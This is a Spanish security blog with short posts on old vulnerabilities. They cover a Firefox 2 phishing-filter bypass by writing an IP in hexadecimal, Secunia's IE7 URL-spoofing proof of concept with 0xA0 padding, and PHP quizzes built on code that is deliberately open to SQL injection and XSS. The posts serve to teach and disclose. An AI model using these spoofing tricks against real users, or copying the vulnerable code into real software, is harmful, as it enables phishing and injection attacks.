Categories
.NET ASP.NET Seguridad

Vulnerabilidad en Visual Studio 2005

Hoy a sido publicado un bug -exploit incluido- en Visual Studio 2005, que permitiría al atacante obtener ciertos permisos en la máquina afectada.

An attacker who successfully exploited this vulnerability could gain the same user rights as the local user. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights

Microsoft, sugiere ciertos pasos para aliviar este problema.

Fuente: TheServerSide .NET

Categories
Firefox Seguridad

Evasión del filtro anti-phishing en Firefox 2.0

Al parecer la última versión de Firefox 2 hace una validación sencilla para comprobar si un sitio es falso o no.

Por ejemplo, al entrar a la siguiente dirección se muestra la advertencia indicando que es un sitio fraudulento: http://200.119.135.99/ebay/login5878/

Sin embargo, al ingresar a la misma dirección pero con el IP en formato hexadecimal, ya no aparece tal advertencia: http://0xc8.0x77.0x87.0x63/ebay/login5878/

Fuente: http://ha.ckers.org/

Categories
PHP Quiz Seguridad

Más sobre validación de datos en PHP

Como había mencionado anteriormente, para desarrollar aplicaciones seguras, hay que conocer bien la herramienta o lenguaje con el que se trabaja. Espero que estos pequeños quiz intenten mostrar algunas de las fallas más comunes que cometen los que recién empiezan o ya desarrollan con PHP.

El código mostrado a continuación, ¿tiene alguna falla? ¿cuál?

php:

<?php

if      ( empty( $_GET['user'] ) && empty( $_POST['user'] ) )
        die( 'Bad parameter' );
elseif ( ! empty( $_GET['user'] ) && intval( $_GET['user'] ) < 0 )
        die( 'Bad parameter' );
elseif ( ! empty( $_POST['user'] ) && intval( $_POST['user'] ) < 0 )
        die( 'Bad parameter' );

$sql = 'SELECT  id, name, email
        FROM    users
        WHERE   id = '
. mysql_real_escape_string($_REQUEST['user']);

echo $sql;

?>

Como ya saben, el código mostrado sólo es referencial, pero vale comentar la forma correcta de implementar ese pedazo de código.

Categories
Artí­culos Seguridad

Otra vulnerabilidad en IE7

Secunia muestra una segunda vulnerabilidad en Internet Explorer 7 que facilita los ataques phishing, al mostrar sólo parte de una URL que contiene caracteres 0xA0.

A continuación, parte del contenido de la prueba de concepto que hizo Secunia.

html:

<div id="start"><a href="javascript:StartTest();"><font color="#000000">Test Now - Left Click On This Link</font></a></div>
javascript:

<script language="JavaScript">
function StartTest()
{
 var padding = '';
 for ( i=0 ; i<108 ; i++)
 {
  padding += unescape("%A0");
 }
 newWindow = window.open("", "Win", "width=500,height=325,scrollbars=yes");
 newWindow.moveTo( (screen.width-325) , 0 );
 newWindow.document.location = "/result_22542/?" + unescape("%A0") + unescape("%A0") + "http://www.microsoft.com/"+padding;
 document.location = "http://www.microsoft.com/windows/ie/default.mspx";
}
</script>
Categories
PHP Quiz Seguridad XSS

Pequeño ejemplo de XSS

XSS, es según la Wikipedia un tipo de vulnerabilidad surgida como consecuencia de errores de filtrado de las entradas del usuario en aplicaciones web.

Mostraré un ejemplo que creo que todos hemos hecho o seguimos haciendo hasta ahora:

HTML:

<form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post">
</form>

Y ahora las preguntas: ¿Qué tiene de malo este código?, ¿Es vulnerable a ataques XSS? Espero sus respuestas.